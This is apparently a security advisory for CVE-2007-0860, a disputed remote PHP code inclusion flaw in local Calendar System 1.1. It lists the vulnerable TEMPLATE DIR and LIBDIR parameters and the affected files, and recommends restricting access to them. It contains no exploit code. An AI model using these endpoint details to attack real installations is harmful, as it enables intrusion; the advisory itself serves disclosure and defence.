CVE-2007-0860

Name of the Vulnerable Software and Affected Versions: local Calendar System version 1.1

Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the TEMPLATE DIR parameter to files such as showinvoices.php, showmonth.php, showevents.php, retrieveinvoice.php, modifyitem.php, and lookup userid.php; or the LIBDIR parameter to files like editevent.php, resetpassword.php, signup.php, showmonth.php, showday.php, showevents.php, and lookup userid.php. A third party has disputed this issue, stating that the associated variables are set in config.php before use.

Recommendations: For local Calendar System version 1.1, as a temporary workaround, consider restricting access to the TEMPLATE DIR and LIBDIR parameters in the affected files until a patch is available. Avoid using the TEMPLATE DIR parameter in the affected API endpoints, such as /showinvoices.php, /showmonth.php, /showevents.php, /retrieveinvoice.php, /modifyitem.php, and /lookup userid.php, and the LIBDIR parameter in /editevent.php, /resetpassword.php, /signup.php, /showmonth.php, /showday.php, /showevents.php, and /lookup userid.php, to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.